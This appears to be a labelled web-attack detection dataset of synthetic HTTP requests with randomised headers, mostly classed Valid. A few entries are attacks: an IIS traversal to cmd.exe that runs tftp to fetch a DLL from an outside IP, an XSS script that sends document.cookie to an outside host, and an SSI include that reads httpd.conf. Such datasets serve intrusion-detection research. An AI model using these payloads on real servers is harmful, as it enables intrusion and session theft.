UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 170x2008
Via: 8.2 www.sf7at.css:7, 2.1 www.vqWtIO.tiff, 2.5 0.60.32.88
Transfer-Encoding: gzip
Upgrade: uietn/2.4
Warning: 512 13.143.191.178:1 "gLnswk" 
X-Forwarded-For: 109.176.189.188
X-Serial-Number: 72395720
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10577
Start - Id: 11839
class: Valid
GET /2DRBpr8pX.hWn/iS0ntlhtpteeuIhmrn/iaitfdakfWs5/ocfdppdeedz4llm0na/t-W-G3kf.php3?le=83 HTTP/1.1
Host: www.geetit6i.ch:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: mte6ie-d;q=0.4, 7d7e-iBbe, wLeel43-cir;q=0.2, nAeatKbi-l;q=0.7, i-tI0Ll
Cache-Control: min-fresh=60753
Client-ip: 28.8.227.149
Cookie: dtrtIa7ftas=e-3bBM1hAvxv;d5eimnnmmdejrI=3238;ad7orfeUiqlma=hlOaeHxa?gvbscriptnhn;i8ijtcoPstSar0g=hAd aticeebstdinrtaetcpe;l9IbseaarT8ma=a1ND
Cookie2: $Version="845"
Date: Sat, 18 Feb 06 05:02:06 GMT
ETag: "hP5TcJChMEOZ4s4KgW"
Expect: hheiA3
From: raeRsdn@ezgoodi.biz
If-Modified-Since: Mon, 05 Apr 04 21:22:52 GMT
If-Unmodified-Since: Wed, 23 Apr 08 09:05:11 GMT
If-Match: *
If-None-Match: "WqX.P.Nh0Cqj@TqG3az"
If-Range: "1Pzwc3VPZgLYb7d_"
Max-Forwards: 705
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: NTLM bmE4SnVlb2xuWWVmZXNPb2NwOWg3emVvbmdjY2Vhd2ZnYWFhb2xl
Authorization: NTLM d2s4bXB0dG5GYXdtbml0MnRpT25rZTJrdGxybDhNZ29p
Range: -9087,256-
Referer: /bduemaeu/Ni5s/dy8mrr/7iaR9cH.wav
TE: deflate;q=0.1
Trailer: Accept-Language
User-Agent: Mozilla/5.1 (Windows; U; Win 9x 6.2; hq-ut; rv:0.2.1) Gecko/01499118
UA-CPU: x86
UA-Disp: 032,592,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 045x0190
Via: 1.2 www.ed7r.htm, 5.5 www.c4dr.png
Transfer-Encoding: compress
Upgrade: qeona/2.2, e3aae/0.6
Warning: 779 www.runsnon.css "al5s6npNr3oe0Heo" "Sun, 08 Mar 09 02:18:33 CET"
X-Forwarded-For: 154.0.65.175
X-Serial-Number: 63208652767395
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11839
Start - Id: 28232
class: Valid
GET /efehlnldWber6/i2acrrtRe6rnubTaots0/pDMd7Hh/mv.dll?Csaer=ifwn%40I4&8jandETGtconnectm=1&group by.Ezimg8wp-=1orperlo2&dnh=lrtllGgJvrm3&wC5ihogmeuY=nRm9Q3_U9&nr=lsTe&allA6EbEzwotwRi=axp_si&lmeahe9ce=472 HTTP/1.1
Host: www.oxde.ch
Connection: noH4t
Accept: */*
Accept-Charset: hz-gb-2312, iso-10646-ucs-2;q=0.2, iso-10646-ucs-2
Accept-Encoding: compress
Accept-Language: ds-rediraMb;q=0.9, enTIOsea-se3fsSm;q=0.1
Cache-Control: max-stale=0850
Client-ip: 30.43.35.66
Cookie: dhon9nizksj3da=20167;Dqh1GuyisYHc=46133
Cookie2: $Version="3"
Date: Mon, 06 Sep 04 05:16:22 GMT
ETag: "QEJBBybmVqmATZlH6iN"
Expect: 100-continue
From: Rvnem7Ei@tyundflr.fr
If-Modified-Since: Fri, 16 Apr 04 18:07:21 GMT
If-Unmodified-Since: Tue, 19 Jul 05 23:04:54 UTC
If-Match: "q9vTg39SlHTK@ws"
If-None-Match: "hHzMd9vRQUkF_nHZeqRj"
If-Range: Sun, 12 Apr 09 03:46:30 UTC
Max-Forwards: 2
MIME-Version: 3.4
Pragma: mrEts=ndV0izn
Proxy-Authorization: NTLM cmVuaXltZWVscGVyY29lb2xhaHRzYWVtc3N1bnJ3Ym9hcmFpSWRhY28xc3E=
Authorization: Basic dWVvaXBOOmVkdW1Pc3M=
Range: 560912-
Referer: /tani/wetny/az8aat.txt
TE: gzip,chunked
Trailer: If-Modified-Since
User-Agent: meideeWj (v1Tf.QgMjC)
UA-CPU: MIPS
UA-Disp: 7874,6904,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 3395x113
Via: 2.1 145.36.40.118
Transfer-Encoding: cehw
Upgrade: uOiar/2.7, NgZ73n/8.2, sDhb/6.3, oeA/4.9
Warning: 924 www.i9iai.jpg "n67aimtnoeOah" "Wed, 07 Sep 05 06:35:32 GMT"
X-Forwarded-For: 178.243.220.136
X-Serial-Number: 144317661774202
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28232
Start - Id: 12026
class: Valid
GET /Gj_KH/r3Ec6/HRztMP/3v0YVN/rKVeeNs/osou6hyali9fgiy/7lseetj3.swf?Hkehaitrtn=11766592&uxnGhg=Ee1&egrrf6nthO=9828270&euoehtwssf1u=660214&ainElltnH=c%25oeanw&.lz@nDA-6Xk=4enapwinntandngpeejrmdmem&ifF5yXfJmN=meOG93.6&yvrh=66706329&agTthf=och2LoHitzaniuPla&le=anletrrosn3len&jeiLkfh=86835625&tnofsliaml=9251 HTTP/1.0
Host: 195.93.192.113:26431
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-arabic;q=0.1, x-mac-arabic;q=0.0
Accept-Encoding: *
Accept-Language: yuekFcrx-SschdAe, a8tHn-te, eh-ed;q=0.6, nhio-em, ej-elln
Cache-Control: max-age=6
Client-ip: 156.109.177.225
Cookie: eeaii=mThdB@qKMh;NRAoS=nLOWir;locationSxadminidQrtnph-H=dshn(dNa;4t=05
Cookie2: $Version="33"
Date: Wed, 08 Feb 06 15:29:28 UTC
ETag: "4VdNvDxnQ_vOTnM_5thW"
Expect: Sqoc8=h1egNw
From: bteasrrn@to2anee.fr
If-Modified-Since: Mon, 07 Apr 08 19:55:42 GMT
If-Unmodified-Since: Wed, 04 Feb 09 07:07:26 GMT
If-Match: *
If-None-Match: "4qldFHMbB3wGsuO"
If-Range: *
Max-Forwards: 1
MIME-Version: 5.7
Pragma: rt4p=h
Proxy-Authorization: Digest realm
Authorization: Digest nc=eb04F08d
Range: 7584-,-2,4553-54899
Referer: /srdaa/erose7/tip8p3.mdb
TE: trailers,chunked;q=0.4,gzip;q=0.6
Trailer: Pragma
User-Agent: Iyh9f (hoqaqBlmTI; 6m_Zu4G.)
UA-CPU: x86
UA-Disp: 123,4822,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 165x736
Via: HTTP/2.6 157.42.167.80, 6.3 142.85.130.215:27716, 7.3 255.31.243.236:91703
Transfer-Encoding: identity
Upgrade: oTddee/5.0, wqgnHu/8.6, oneh/9.4, hep/0.4
Warning: 833 144.28.17.62 "isfwPh1kyWgl" "Sun, 24 Sep 06 16:28:02 UTC"
X-Forwarded-For: 46.91.218.72
X-Serial-Number: 447031171
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12026
Start - Id: 21745
class: Valid
GET /oP23GdA.UcgY._/se_06/6ieeeDejApms/cprocessing-instructionechoj5R-wtuhvx/oBCTMAq/aeetnweeWtmsa.nsf? HTTP/1.0
Host: 193.146.193.39
Connection: oral
Accept: text/*, video/*;q=0.8, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-age=2157
Client-ip: 22.154.71.149
Cookie: 7J4WG=0939621;mexnirsoadi0n=rn4eh)ti o;ttiNmcnst=5320791
Cookie2: $Version="52"
Date: Thu, 07 Dec 06 01:11:05 UTC
ETag: W/"q4pnhI1NSQfSL9Pc4w-P"
Expect: sase
From: scmetNE@looeei.net
If-Modified-Since: Fri, 17 Jun 05 08:30:09 GMT
If-Unmodified-Since: Tue, 13 Jan 04 03:16:26 UTC
If-Match: "WUQsPLU2p6eIKlu3"
If-None-Match: *
If-Range: *
Max-Forwards: 8616
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: 0k9Twe twle=ds1o3ar
Authorization: 3aN8e i17e6e=l3uoy0e
Range: 0-
Referer: http://tGlo3uin.it/vzlqvssi/9Sadhon/tseesRr/swabs/dwN0j7c8.bin
TE: trailers
Trailer: TE
User-Agent: Be0ohgpnmp/6.9.2.4.3
UA-CPU: PowerPC
UA-Disp: 6826,0757,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 1742x3001
Via: HTTP/2.1 129.116.31.180
Transfer-Encoding: compress
Upgrade: eaw0U/0.9, r5loeg/6.1
Warning: 924 54.229.114.181 "smLesryihhrc" "Tue, 15 May 07 20:56:14 GMT"
X-Forwarded-For: 98.250.132.6
X-Serial-Number: 21815
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21745
Start - Id: 44269
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.1
Host: 47.130.95.13
Connection: close
Accept: video/*;q=0.6
Accept-Charset: iso-8859-9;q=0.4, x-mac-ce
Accept-Encoding: 
Accept-Language: rt3dwb-rOe;q=0.3, ghspfas9-nat
Cache-Control: max-age=834
Client-ip: 225.50.172.247
Cookie: bw0ziIS=2;ZnFOZ=2a5flwe$;ih2iihgIql=iPaA9mC8iH
Cookie2: $Version="544"
Date: Wed, 01 Jun 05 22:39:11 GMT
ETag: W/"JQx0uHTwXQsPyN32k.C"
Expect: 100-continue
From: iefdsb@2Nyh.org
If-Modified-Since: Mon, 19 Sep 05 05:53:20 GMT
If-Unmodified-Since: Fri, 07 Apr 06 21:48:04 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 42
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM VGxycmhjbG53cjdsc0Z0aWVuaGl0bmVib2lhZWk3U2ljYXZ4bnNpb2JybG0=
Authorization: nsxuo aialrtes=etcah0s
Range: 1630-9,-816
Referer: http://Qmtnenat.uk/el3yl/5svNoe.css
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/3.9 (compatible; mzwAfp; Open BSD i386; eelLEaei7)
UA-CPU: 68000
UA-Disp: 9070,4804,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 7064x6561
Via: 3.5 250.32.202.244:89, 5.5 www.dDase.css
Transfer-Encoding: deflate
Upgrade: coeeIl/9.2, natae/9.1, hi4/9.9, 3tu3nt/4.6, epa5c/2.6
Warning: 674 28.181.161.239 "fsbetechtt6msa4eu" 
X-Forwarded-For: 209.233.129.22
X-Serial-Number: 87791101469123011682
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44269
Start - Id: 48075
class: XSS
GET /pdsl1/alegf/gueoetenfsih7uXeRf/arbmn1hniCieoneEdeit/ufgtendisiotAGaSzeR5/eZkQynL.shtml?9yyhudi=%3C%21--+--+--%3E%3Cscript+++%3E%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.al.com%2Fcgi-bin%2Fliieraro.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++++%3E%3C%21--+--+--%3E HTTP/1.0
Host: www.pbip.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: max-stale
Client-ip: 151.8.225.81
Cookie: ji5canbs=68987;jnes=os;n44sIet=yRZ
Cookie2: $Version="5"
Date: Wed, 30 Jan 08 17:01:29 UTC
ETag: "U9-YQ6G4Lm_.cAH"
Expect: ongmeo9
From: aetdmr@igroised.de
If-Modified-Since: Sat, 25 Apr 09 01:54:50 GMT
If-Unmodified-Since: Tue, 11 Aug 09 19:22:21 UTC
If-Match: *
If-None-Match: "Nvg0jxTzLr-Gcr9.lw"
If-Range: Mon, 10 May 04 22:34:19 GMT
Max-Forwards: 40
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZmVodnNoc29lcmVlY290ZW9haDRhbnVyZ2Y4Tm9pbGVlc3VkVHVkdGZ1
Range: -1,041-88,-53
Referer: /etanei/iar8RR.pdf
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.2 (X11; U; Open BSD i386 9.7; nW-oh; rv:2.5.8) Gecko/12525040
UA-CPU: x86
UA-Disp: 4437,742,16
UA-OS: Win9x
UA-Pixels: 6001x2247
Via: FTP/0.4 www.paasc.html, HTTP/8.0 www.reoh3soe.gif:285
Transfer-Encoding: gzip
Upgrade: 0eadh/9.5, oyzasn/0.3, ulmsi7/4.4, bdhaod/9.0, riJn/7.4
Warning: 161 187.118.43.218:03175 "iito86" 
X-Forwarded-For: 69.186.228.89
----: ---------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48075
Start - Id: 10859
class: Valid
GET /pDhome-Kt1/he/JBLyhttplogs7gRsysteman/nz8u7A-a2hGOAgEJ-gwB/iudlAo84tRlu7sA6o/tXZtA4DsTR@Mc/noL4rnehHcnhefeatglx/ednE9mfdooarhin/oqGn_JmiaJa/shxTictsppd/7pJ0.tiff?NWjYp1access_logshutdownDCF=saw+E&T_7KUoo=jran&J9oDdocumentHnhCrf=2&gadamsit3=lxAT&AUeAfromuDk=99297&ztotoei1Kr2mlrv=sPy&btylnhsJ0hd=9412181&MDQtsock_streamAzL9=rforotlaediets&seue=g+eom+&bgWu4urebhLs=EcAfaptwa&eeRi=du6zdYoh&EoIynn=7bgsoundu5susecatTo%25j%40%5BwinntfhEh HTTP/1.0
Host: 57.135.195.123:80
Connection: ades
Accept: audio/x-wav, text/*, image/png;q=0.1
Accept-Charset: x-mac-greek;q=0.3, windows-1255, cp-950, windows-1252;q=0.9, windows-874;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=1
Client-ip: 177.2.181.122
Cookie: mUZI5E=7.oQ9;OaafBnsa=t5Rg;esqw=8871642
Cookie2: $Version="122"
Date: Fri, 14 Dec 07 13:07:17 GMT
ETag: W/"YaCyQ65DuvEB29L"
Expect: isntrath
From: MAtn@aarleli.uk
If-Modified-Since: Mon, 29 Dec 08 22:25:27 UTC
If-Unmodified-Since: Sun, 13 Mar 05 14:04:41 UTC
If-Match: "3MYSfdtmiiZiRL2d"
If-None-Match: *
If-Range: "wVxnmWUpcCKrkUI"
Max-Forwards: 323
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: NTLM bHRvb2Vyd2VuU29lQWVtMFRBdG9ld2V5aVlvbmFlZXNmb3VTcmVPdGxzbnY=
Authorization: nxby t4heyrBi=oetg
Range: -67,-5514,24049-4325
Referer: /60clar/dtKutte.zip
TE: gzip,deflate
Trailer: Connection
User-Agent: Mozilla/5.6 (Windows; U; WinNT 0.8; tk-07; rv:5.9.3) Gecko/29585079
UA-CPU: 68000
UA-Disp: 988,901,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 488x175
Via: HTTP/4.8 www.5mrtn.htm, 0.3 78.73.54.244
Transfer-Encoding: identity
Upgrade: hwTcr/4.5, 42n5/1.2
Warning: 434 www.ie6nOtrs.css "ugbasogg" "Sat, 09 Sep 06 10:13:30 CET"
X-Forwarded-For: 115.173.200.39
X-Serial-Number: 907495686273869
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10859
Start - Id: 17698
class: Valid
GET /84JY/c8r/AZcikenR1Z_y2bgsound/r1DVlanfal/eD1GUqGbTNxS00/CIY-onull6Zkw0aDHL.sh?y7PsholgeRnii=17815790&wm4bQ=s-ZXbU&UtfbssRkto6=Nr6inlde&rah=96&ph9neabaatelxi7=398261&onnsv=cSEX80Xb_7I&.x9OTMcQ=Drechoa8+Ns%5Cda6otE&mtnrahpyt=983583706&3gemcTopuA=ihy%5Cdo%3Cndgdbnhaeiw&BvWwT=nn2cK HTTP/1.1
Host: 9.43.20.153
Connection: keep-alive
Accept: video/*;q=0.2
Accept-Charset: shift_jis, utf-7, iso-8859-8;q=0.6, euc-cn;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 182.226.45.19
Cookie: eTshvhsrdtGml=5682316;hn=vgedpluE2O;M0homeOallHdwa@Heval=38;ctts=<[;tseE=5;2@.RnhJG=ehdci~G:
Cookie2: $Version="8"
Date: Fri, 22 Jan 10 01:32:53 UTC
ETag: W/"vXRrKjoBuCyZWZaNRM"
Expect: dIhE=yjonsoC;cjwnf
From: ham2@rhhtcs.de
If-Modified-Since: Sun, 16 Sep 07 11:03:29 GMT
If-Unmodified-Since: Fri, 06 May 05 05:53:56 UTC
If-Match: *
If-None-Match: "CCZJuM4vb4EJrOhAgpk"
If-Range: *
Max-Forwards: 9811
MIME-Version: 9.0
Pragma: or='ex4in'
Proxy-Authorization: Basic bmdvY2g6bWNpdTlp
Authorization: Digest username="EijvK"
Range: -0,28-7801
Referer: http://taecar.com/peahed/inu5/ie6rjid/nJwq.tar.gz
TE: deflate;q=0.7,gzip;q=0.8
Trailer: Upgrade
User-Agent: wtpRnuobt/5.6.3.0.1
UA-CPU: x86
UA-Disp: 4852,629,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 7830x724
Via: FTP/6.2 www.stozs.css, ePnigi/4.0 www.lbor.htm, 2.0 www.aEioept.htm
Transfer-Encoding: gzip
Upgrade: 4rd/7.7, enhn/4.6, cfe/5.9
Warning: 693 205.206.134.117 "rkctrioeeS1hAa" "Mon, 18 Dec 06 11:42:54 CET"
X-Forwarded-For: 36.178.47.35
X-Serial-Number: 1990528944468
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17698
Start - Id: 39743
class: SSI
GET /Iv_.dI.echoGY/VfRhtpass4Y/dgybemegeklt/as2f4N27-@vP0GsTDse/edx/sUsjone0dtnitdit/huinueepoeynHhdlr/yIzm1.BWTpZeNdKod/me/eyiain.css?sswso=zohneb0I%29a1t&3rb=%3C%21--++++%23include+virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22+--%3E HTTP/1.1
Host: www.ttrrikaNee.st
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: iso-2022-kr, x-mac-roman;q=0.7, us-ascii;q=0.8
Accept-Encoding: 
Accept-Language: esa-has, sTtrcSts-ztmsaews;q=0.2, sna-it9er1UR;q=0.9, wa-5ibxm3, e3ei7m-iintpj
Cache-Control: no-transform
Client-ip: 10.65.26.121
Cookie: lrmoaenbdlUe=91;hrfoldwu=7;Lese7liwrh=feiframeelboot.inilen1omhha
Cookie2: $Version="7"
Date: Sat, 18 Jun 05 23:22:58 CET
ETag: "tYCCtqQXAuY.j2b@k7Gs"
Expect: td7ebjge
From: n4tbla@ol8e.st
If-Modified-Since: Tue, 27 Nov 07 22:59:17 UTC
If-Unmodified-Since: Tue, 11 Sep 07 03:56:29 GMT
If-Match: "3y6Fcc-W@ilXEcQNbt14"
If-None-Match: "WS-AYxw8TAVXttq"
If-Range: *
Max-Forwards: 9
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: nyks7 tHmRb8=vgc3
Range: -343,5-1
Referer: /i0ypea/tgrh4d3r/Ecf1hnnz.sh
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/7.1 (X11; U; Open BSD i386 6.6; 7y-ur; rv:5.4.9) Gecko/54718958
UA-CPU: Sparc
UA-Disp: 1946,7252,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 930x2188
Via: jbrs/4.9 151.201.52.185, 7.9 www.Genen.jpeg
Transfer-Encoding: u0er; wtaT=elalt
Upgrade: dhHa/1.3, bqt/4.5, per/1.9, eoto/7.1, xle/6.5
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 177.241.180.13
X-Serial-Number: 43717297958345
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39743
Start - Id: 2765
class: Valid
GET /ssmMXEqG-IMM7nYoSt/tUurT/f3dnolsn/S4ptsnoqPdiufho82str/oeipmxied9O9/0jCh.fTc_ls/QG67TJpassthrutMaccess_logwrkSA.jpeg?@Vvperl8=gt5srsdl&nOnt=iatr6iDxmwcne&yeiha9Iite=980&h6re=tpubetyiAjlib&EdmcoesdamfwZ=epositiono+Cdlb&rUrsaa3=aHdm&P126ogoyLQ=5eae+y5ujbrd&t4nn2di=7iinMCeo9&-R4EF5=hOCu8&osGOTct=16&sosNiiic=54689 HTTP/1.1
Host: www.edTApeaie.de
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-8859-8
Accept-Encoding: *
Accept-Language: h0oirlhn-xxfdnaf, uI3-ep;q=0.5
Cache-Control: only-if-cached
Client-ip: 244.22.33.32
Cookie: cmeH=g;nTtSlons=cILU@;VC5scriptAi=txi
Cookie2: $Version="3"
Date: Sat, 14 Jan 06 20:44:20 GMT
ETag: "p6w9G867wlEvYezWR8Mv"
Expect: ud20arnu
From: lqlhi@vaenn.fr
If-Modified-Since: Mon, 20 Jun 05 15:15:53 GMT
If-Unmodified-Since: Sat, 24 Nov 07 16:01:09 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 23 Jul 04 18:09:45 CET
Max-Forwards: 61
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: a6te0 gehaiuaA=e0ls5enT
Range: -7
Referer: /trei/ioeoea/fesp6anb/deckal/8ef2ws.tiff
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: avzfTSxX5 http://www.or9il.ch
UA-CPU: Sparc
UA-Disp: 9580,602,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 738x004
Via: LctjsR/4.0 239.93.183.4, FTP/4.0 www.n4ra28.jpg, 0.5 www.oer5sh7.gif:706
Transfer-Encoding: compress
Upgrade: qcin/4.8, 7Nka/2.5, sOd/5.0, oktonn/0.2, lS1L7N/0.1
Warning: 581 222.35.204.94 "rhuhssl" "Mon, 12 Feb 07 03:54:33 UTC"
X-Forwarded-For: 33.121.40.254
X-Serial-Number: 82627
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2765
Start - Id: 17440
class: Valid
GET /pofnwyaawmtksfucbtat/r0ujvuQlCD9Kpm88/sDI/shNta/ocreimizwnsttfzRV1e/eeaniaowr/tequlrnajrzSadglhfe/.p-Ty/hea7beooe/utayDwXU.0tc8r5Oo/MWZa1a9updatejup/ia.tiff?s0EW.=946936446&w9rcel8tv=inputwo%3DsE&rol=%7CdHTpt6t&ewg=9462164&6FaD.PyPi4=coc%3Cdelete&n4X6stdinSDJZrv=fori&rtbtEecpeaLM0=3084&Ws=%40attp%2Bxtermii&njnoElelae=4ytnzernae0sia&ameWdn1=%2Bxmlnrt&afp4=akin0aahzic9&aneene=voN&rt3aae4tIeAwrmt=411 HTTP/1.0
Host: 114.129.214.245
Connection: nwobn
Accept: audio/*, video/mpeg;q=0.9, video/*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 71.107.138.4
Cookie: eaowTsiRiohtdR=nje  siktktIh2sj~a;bodiiestTn1oteU=907122054;ldR=bkoXCdo_Ny;maeeng=0991;ttlTtY6idrii=Orn6h
Cookie2: $Version="716"
Date: Wed, 24 Jan 07 01:50:28 UTC
ETag: "7LFj42hbIyOW.NtD"
Expect: eeOjeim=shOr;el0lberd=Lrnleij
From: 6osilt@7iEee.st
If-Modified-Since: Tue, 13 Mar 07 16:03:32 CET
If-Unmodified-Since: Sat, 03 Oct 09 19:19:03 UTC
If-Match: *
If-None-Match: "Js28d2NcfXToaghtm"
If-Range: "Pt5DI8PajrxRR7A"
Max-Forwards: 7
MIME-Version: 5.3
Pragma: r=qoide
Proxy-Authorization: Basic ZGVDb09pMDplbmRnY3Q=
Authorization: Digest opaque="6H9o"
Range: 9-86744,230338-150282,297-98990
Referer: http://www.coesan.org/iTihvy/zo0zeys/yOoc2.mpeg
TE: trailers,chunked;q=0.4
Trailer: Host
User-Agent: mnnZCPtA5 http://www.5eo7Sx.org
UA-CPU: MIPS
UA-Disp: 113,258,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 769x9384
Via: FTP/2.8 23.161.124.160
Transfer-Encoding: compress
Upgrade: aAc/1.9, ntnoe/0.6, faiehi/4.5, ttsl/3.1
Warning: 807 www.ienu.tiff:7433 "tnzkneini" "Fri, 27 Feb 09 18:56:57 UTC"
X-Forwarded-For: 29.239.233.138
X-Serial-Number: 52284057
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17440
Start - Id: 7379
class: Valid
PUT /mYmSjfnbal.Soq743Aq3/DaeittnoeestE/meas8ebbvrCpnmto7/narcnl/Oha1lM8U/o3VBd/mdoo7ptiowgefE/rd7lt2sacswUsnnxd.png? HTTP/1.0
Content-Length: 231
Content-Language: tbh,te,9tesiy
Content-Encoding: deflate
Content-Location: http://dt0eeer.fr/nev69bee/ibLgst1o.jpg
Content-MD5: bmFvc2JmZWlmZWJOZW5hdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 16 May 04 20:20:56 GMT
Last-Modified: Sun, 15 Jan 06 13:53:51 GMT
Host: www.llTu2Te.ch
Connection: keep-alive
Accept: video/mpeg;q=0.5
Accept-Charset: iso-8859-6;q=0.0, windows-1258;q=0.7, x-mac-chinesesimp;q=0.6, x-mac-korean;q=0.6
Accept-Encoding: 
Accept-Language: ejmtstO-9UCso, gpatno-ubhz
Cache-Control: dythc=0rmNstx
Client-ip: 139.170.250.122
Cookie: AN0whereR8lsvQ=54003;iwsliltya2=854
Cookie2: $Version="012"
Date: Tue, 06 Feb 07 10:08:15 CET
ETag: W/"h0Ub3tGUQhgHBSBo5X"
Expect: 100-continue
From: coe5re@9jhe.fr
If-Modified-Since: Tue, 23 Oct 07 18:45:16 UTC
If-Unmodified-Since: Mon, 24 Apr 06 17:51:43 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 5.7
Pragma: r=rr
Proxy-Authorization: NTLM dGoyc3RobnNpSTdjbUVlYXVoZW1lM3RhbW8wT21vdFJJbjZldnJjMDdEZWdhSW9z
Authorization: hIat hhzbeY=wilnefc
Range: 253426-5
Referer: /rnzm/eeTqtohD.conf
TE: deflate
Trailer: Max-Forwards
User-Agent: Mozilla/0.0 (Machintosh; U; PPC Mac OS X 0.9; et-hp; rv:9.4.0) Gecko/23889314
UA-CPU: StrongARM
UA-Disp: 621,301,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 850x401
Via: 4.8 www.lap6trQu.jpg
Transfer-Encoding: compress
Upgrade: Tcl/1.4, hde/4.4, fe2s6/8.8, prra/7.3, ta2/1.0
Warning: 129 www.b5xcg9r.htm:36876 "FiaNtata6i" "Sat, 06 Feb 10 04:16:05 UTC"
X-Forwarded-For: 114.0.180.179
X-Serial-Number: 923074126811
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

tosnimaatagI1=betweeno) o&Ml..l8gpsnY=15370409&nq=27&a2=nclogupdate |&99iewna=passwdc0Ehsoi&uotx07Narwkabsw=e7kocdeoutez&fth0nDnoqacaodC=soiI&urgstt=:2]fcopy9a'ayx&oBaae=irt&Hitti2rathU=2connecttyy&Aadlrardekq=paebtbitNif

End - Id: 7379
Start - Id: 6186
class: Valid
PUT /trW6JPzeClG/oHytBMyEOFyNOS18Jqql/hqgR/ehebrod4lsmaeoENmosw/p5rp5E-9W98pEseotWAn/aPAxOe5jnXZ/t.5ErlHP8u@TXeJF/qj0DoQ4KYZnMK921/tuuXZJuZyztRa/9i.nsf? HTTP/1.0
Content-Length: 25
Content-Language: tydc
Content-Encoding: deflate
Content-Location: http://uxlh.org/Cfldl/ktnt7i4/nlemish/oodm/akuexeO.tar.gz
Content-MD5: aXh2bGlvdHVMbE9hcm5FaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Jul 04 04:17:21 GMT
Last-Modified: Sun, 07 Dec 08 07:01:11 CET
Host: www.tm0i.it:80
Connection: close
Accept: text/*;q=0.1, text/plain
Accept-Charset: x-mac-icelandic, euc-cn;q=0.6
Accept-Encoding: *
Accept-Language: euoyioua-a;q=0.8, uDeyonsI-re;q=0.6, lMtmcx7a-wei;q=0.3
Cache-Control: yesaeEwa='ah'
Client-ip: 218.116.134.52
Cookie: 8Tfrom6script= lhut=/e<ye\p&;agmhpQaaaWiw2=0214386496;Tp=8$binqiIik;td=10;wuai4toL2QrE=adcearOe
Cookie2: $Version="6"
Date: Thu, 10 Aug 06 01:42:52 UTC
ETag: "1fUuI-UphOGidG.5n"
Expect: 100-continue
From: e5nuLmf@tfebzmq.ch
If-Modified-Since: Fri, 05 Aug 05 09:44:21 CET
If-Unmodified-Since: Mon, 16 Nov 09 17:17:33 CET
If-Match: "NyY.dzVhcWCkLld"
If-None-Match: "0BtY6AIJrGX31HWF92k"
If-Range: Mon, 30 Jun 08 21:57:18 GMT
Max-Forwards: 4044
MIME-Version: 1.9
Pragma: n=ocott
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic Z3Rlb1RzOm45bnk=
